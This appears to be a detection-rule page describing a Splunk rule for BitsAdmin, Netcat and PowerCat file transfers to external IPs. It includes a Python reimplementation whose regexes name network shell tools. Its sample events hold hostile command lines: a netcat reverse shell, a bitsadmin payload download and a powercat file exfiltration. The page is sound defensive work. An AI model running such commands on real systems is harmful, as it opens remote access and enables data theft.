
Summary
This detection rule identifies potential file transfer activity performed with tools such as BitsAdmin, Netcat, or PowerCat, which may indicate data exfiltration or command-and-control (C2) communication. It matches keywords and command-line options that these tools use when transferring files. The logic runs in a Splunk environment over endpoint process data and Windows event logs, filtering command executions for arguments typically associated with file transfers and requiring that the destination IP address fall outside common private IP ranges, so that only suspicious external communication is flagged. For each match it records metadata such as the timestamp, originating host, user, destination IP, and the process involved. This makes the rule useful for monitoring behavior characteristic of threat actor groups, including those associated with the Cadet Blizzard and Black Basta campaigns.
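The following Python is an added illustration of the detection logic described above, run over a handful of constructed process-creation events; it is not the rule's own Splunk search and does not reproduce its keyword list. The tool names, the per-tool transfer indicators, the set of "private" ranges excluded from alerting, and the event field names (loosely modelled on the Splunk CIM Endpoint.Processes fields process_name and process) are all assumptions made for the example.

```python
import ipaddress
import re

# Internal ranges excluded from alerting. The page says the rule drops "common
# private IP ranges" without listing them, so this set (RFC 1918 plus loopback
# and link-local) is an assumption.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

# Tool keyword -> regex over the command line for arguments that indicate a
# transfer or connection. Illustrative indicators; not the rule's own list.
TRANSFER_INDICATORS = {
    "bitsadmin": re.compile(r"/(transfer|addfile|download|upload)\b", re.I),
    "nc":        re.compile(r"(?:^|\s)-[a-z]*[el]\b|[<>]", re.I),  # -e/-l or file redirect
    "powercat":  re.compile(r"(?:^|\s)-(c|l|i|of|e)\b", re.I),
}
# The tool may be the image itself (nc.exe) or a keyword inside a wrapper such
# as powershell.exe -c "powercat ...", so both process_name and process are searched.
TOOL_KEYWORD = re.compile(r"\b(bitsadmin|ncat|nc|netcat|powercat)(\.exe|\.ps1)?\b", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def external_ips(cmdline):
    """Return IPv4 literals in the command line that are not in INTERNAL_NETS."""
    found = []
    for token in IPV4.findall(cmdline):
        try:
            ip = ipaddress.ip_address(token)
        except ValueError:  # e.g. 999.1.1.1 matches the regex but is not an address
            continue
        if not any(ip in net for net in INTERNAL_NETS):
            found.append(str(ip))
    return found


def classify_tool(event):
    """Map an event to one of the transfer tools, or None if none is referenced."""
    m = TOOL_KEYWORD.search(f"{event['process_name']} {event['process']}")
    if not m:
        return None
    name = m.group(1).lower()
    return "nc" if name in ("nc", "ncat", "netcat") else name


def detect(events):
    """Apply tool keyword, transfer-argument and external-IP filters; return findings."""
    findings = []
    for ev in events:
        tool = classify_tool(ev)
        if tool is None or not TRANSFER_INDICATORS[tool].search(ev["process"]):
            continue
        dests = external_ips(ev["process"])
        if not dests:  # no external literal IP: transfer is internal or uses a hostname
            continue
        findings.append({
            "_time": ev["_time"], "host": ev["host"], "user": ev["user"],
            "tool": tool, "process_name": ev["process_name"],
            "dest_ip": dests[0], "process": ev["process"],
        })
    return findings


# Constructed sample events for this example; not real telemetry.
SAMPLE_EVENTS = [
    {"_time": "2024-02-09T10:01:00Z", "host": "WS01", "user": "CORP\\alice",
     "process_name": "bitsadmin.exe",
     "process": "bitsadmin.exe /transfer job1 /download /priority high "
                "http://203.0.113.10/update.bin C:\\Users\\Public\\update.bin"},
    {"_time": "2024-02-09T10:02:00Z", "host": "WS01", "user": "CORP\\alice",
     "process_name": "nc.exe",
     "process": "C:\\Tools\\nc.exe -e cmd.exe 198.51.100.7 4444"},
    {"_time": "2024-02-09T10:03:00Z", "host": "WS02", "user": "CORP\\bob",
     "process_name": "powershell.exe",
     "process": 'powershell.exe -c "powercat -c 10.0.0.5 -p 443 -i C:\\backup.zip"'},
    {"_time": "2024-02-09T10:04:00Z", "host": "WS02", "user": "CORP\\bob",
     "process_name": "bitsadmin.exe",
     "process": "bitsadmin.exe /transfer job2 /download "
                "http://files.corp.example/i.msi C:\\Temp\\i.msi"},
    {"_time": "2024-02-09T10:05:00Z", "host": "WS03", "user": "CORP\\carol",
     "process_name": "notepad.exe", "process": "notepad.exe C:\\notes.txt"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['_time']} {f['host']} {f['user']} {f['tool']} -> {f['dest_ip']}")
```

Only the first two events are flagged. The powercat run is dropped because its destination is in 10.0.0.0/8, and the second bitsadmin job is dropped because it names a hostname rather than an IP literal; both are direct consequences of the private-range filter described above, and a practitioner tuning this rule should decide whether transfers to internal hosts and URL-based transfers need separate coverage.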
Categories
- Endpoint
- Cloud
- Network
Data Sources
- Process
- Windows Registry
- Logon Session
ATT&CK Techniques
- T1105
- T1071.002
- T1197
Created: 2024-02-09